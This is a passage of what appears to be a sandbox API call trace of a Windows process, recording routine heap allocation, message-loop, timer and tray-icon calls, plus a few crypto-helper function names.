Size=0x4) returned 0x9c2788 [0166.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 1 [0166.805] TranslateMessage (lpMsg=0x87f114) returned 0 [0166.805] DispatchMessageW (lpMsg=0x87f114) returned 0x0 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0166.805] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e7b0) returned 1 [0166.806] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0166.806] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0166.806] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0166.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0166.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0166.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0166.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.807] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2718 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0166.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0166.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0166.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0166.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0166.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0166.808] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0166.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0166.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0166.808] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0166.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0166.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0166.809] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0166.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0166.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0166.809] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.809] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.809] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0166.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0166.810] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0166.810] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0166.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0166.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0166.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0166.811] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.811] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0166.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0166.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0166.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0166.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0166.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0166.812] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0166.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0166.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0166.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0166.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0166.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0166.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.814] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0166.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0166.814] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0166.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0166.815] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0166.815] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.815] 